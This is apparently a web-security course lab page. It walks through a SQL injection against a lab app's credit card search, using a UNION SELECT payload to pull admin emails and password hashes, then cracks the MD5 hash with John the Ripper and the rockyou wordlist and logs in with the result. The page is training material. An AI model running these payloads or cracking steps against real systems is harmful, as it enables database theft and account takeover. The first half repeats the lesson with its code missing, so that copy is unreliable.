Fortunately, it is now quite rare that applications store users' passwords in plain text in a database. In such a case, an attacker who manages to steal the database would have a bunch of passwords to try, for example, in users' accounts on other services (which is why passwords should not be reused).

Instead, passwords are usually "hashed", meaning they are run through a one-way hashing algorithm, such as MD5, SHA1, etc.

For example, the MD5 hash of the text "kissa123" is 

. The application could then save it to the user's database as follows:

PasswordHash: 13c3a117d0013ab22417c8edca354b76

When Jaska Jokunen logs in, the application verifies if 

 is equal to the password hash saved in the database.

An attacker, on the other hand, cannot directly change the hash 13c3a117d0013ab22417c8edca354b76 back to the form "kissa123". Hash algorithms are one-way.

However, an attacker can guess with brute force and wordlists.

Is "pokemon" hash 13c3a117d0013ab22417c8edca354b76? No.

Is "kitara456" hash 13c3a117d0013ab22417c8edca354b76? No.

Is "cat123" hash 13c3a117d0013ab22417c8edca354b76? Yes.

This kind of guessing is usually called password cracking.

Obtaining the password hash of an admin user

Use the familiar and secure SQL injection vulnerability in the credit card search and retrieve the admin user's password hash. The steps are exactly the same as in the task where you retrieved the system administrator's password, except that the password was in plain text at that time. Here are the steps for refreshing your memory (all of these have been learned earlier in the course):

 clause text and comment out the rest of the query with double dash (and space) so that the query goes through again.

, etc. until you determine the number of columns returned by the query.

 statement with the correct number of columns. First try with 

 values and then try to find a column that is reflected in the application, i.e., a reflection point.

 to retrieve the email and password columns from the user table. Filter the rows to only those where the value in the 

For variation, you can return both the username and password hash together in one column, using the MySQL 

Use the John The Ripper (JTR) tool to crack the MD5 hash. Open the attacker's terminal and copy the admin user's hash into a text file named hash.txt. For example, like this:

Password list used for guessing (--wordlist): /usr/share/wordlists/rockyou.txt

The output should be something like this; in this case, the password was "tucker".

Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) Press 'q' or Ctrl-C to abort, almost any other key for status

DONE (2021-07-01 07:12) 100.0g/s 115200p/s 115200c/s 115200C/s football1..summer1

You can still execute the john --show command:

Log in with the previously provided email and compromised password to complete the exercise.

In this lab, passwords are protected with a hashing algorithm, so you can crack them with the JTR (John the Ripper) tool.

MySQLI - Cracking password hashes

## Hash algorithms

Fortunately, it is now quite rare that applications store users' passwords in plain text in a database. In such a case, an attacker who manages to steal the database would have a bunch of passwords to try, for example, in users' accounts on other services (which is why passwords should not be reused).

Instead, passwords are usually "hashed", meaning they are run through a one-way hashing algorithm, such as MD5, SHA1, etc.

For example, the MD5 hash of the text "kissa123" is **13c3a117d0013ab22417c8edca354b76**. The application could then save it to the user's database as follows:

**Email: jaska.jokunen@example.com**

**PasswordHash: 13c3a117d0013ab22417c8edca354b76**

When Jaska Jokunen logs in, the application verifies if **MD5(Jaska's entered password)** is equal to the password hash saved in the database.

An attacker, on the other hand, cannot directly change the hash 13c3a117d0013ab22417c8edca354b76 back to the form "kissa123". Hash algorithms are one-way.

However, an attacker can guess with brute force and wordlists.

- Is "pokemon" hash 13c3a117d0013ab22417c8edca354b76? No.
- Is "kitara456" hash 13c3a117d0013ab22417c8edca354b76? No.
- Is "cat123" hash 13c3a117d0013ab22417c8edca354b76? Yes.

This kind of guessing is usually called password cracking.

---

## Obtaining the password hash of an admin user

Use the familiar and secure SQL injection vulnerability in the credit card search and retrieve the admin user's password hash. The steps are exactly the same as in the task where you retrieved the system administrator's password, except that the password was in plain text at that time. Here are the steps for refreshing your memory (all of these have been learned earlier in the course):

- Escape from the **LIKE** clause text and comment out the rest of the query with double dash (and space) so that the query goes through again.
- After the query, add **ORDER BY 1**, **ORDER BY 2**, etc. until you determine the number of columns returned by the query.
- Add the **UNION SELECT** statement with the correct number of columns. First try with **NULL** values and then try to find a column that is reflected in the application, i.e., a reflection point.
- Use **UNION SELECT** to retrieve the email and password columns from the user table. Filter the rows to only those where the value in the **admin** column is **True**.

For variation, you can return both the username and password hash together in one column, using the MySQL **concat** function.

Model:

```sql
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,concat(email, ":", password),NULL FROM user WHERE admin=True
```

---

## Breaking the seal

Use the John The Ripper (JTR) tool to crack the MD5 hash. Open the attacker's terminal and copy the admin user's hash into a text file named hash.txt. For example, like this:

```
echo -ne "6243e1116e9de008e4dcf0aa2700ca89" > hash.txt
```

Next, run JTR (**john**) with the following settings:

- Hash algorithm (--format): raw-md5
- Password list used for guessing (--wordlist): /usr/share/wordlists/rockyou.txt
- File containing the hash: hash.txt

```sh
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

The output should be something like this; in this case, the password was "tucker".

*Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 \[MD5 256/256 AVX2 8x3\]) Press 'q' or Ctrl-C to abort, almost any other key for status*
***tucker**** (?) 1g 0:00:00:00*

*DONE (2021-07-01 07:12) 100.0g/s 115200p/s 115200c/s 115200C/s football1..summer1*

You can still execute the john --show command:

```sh
john --show --format=raw-md5 hash.txt
```

The command should output the password.

*?:****tucker**** 1 password hash cracked, 0 left*

Log in with the previously provided email and compromised password to complete the exercise.

@exercise e9b9b7d961ff


(MySQL) UNION and breaking password hashes

SQL injection is probably the cause of the majority of serious data breaches, mainly because vulnerability is very likely in a large application if the technology choices are bad, and the result is usually leaking the entire database to the attacker.

SQL injection is likely the cause of the majority of serious data breaches, mainly because vulnerability is very likely in a large application if the technology choices are poor, and the consequence is usually the leakage of the entire database to the attacker.

(MySQL) UNION and breaking password hashes

Hash algorithms

Learn to hack — start here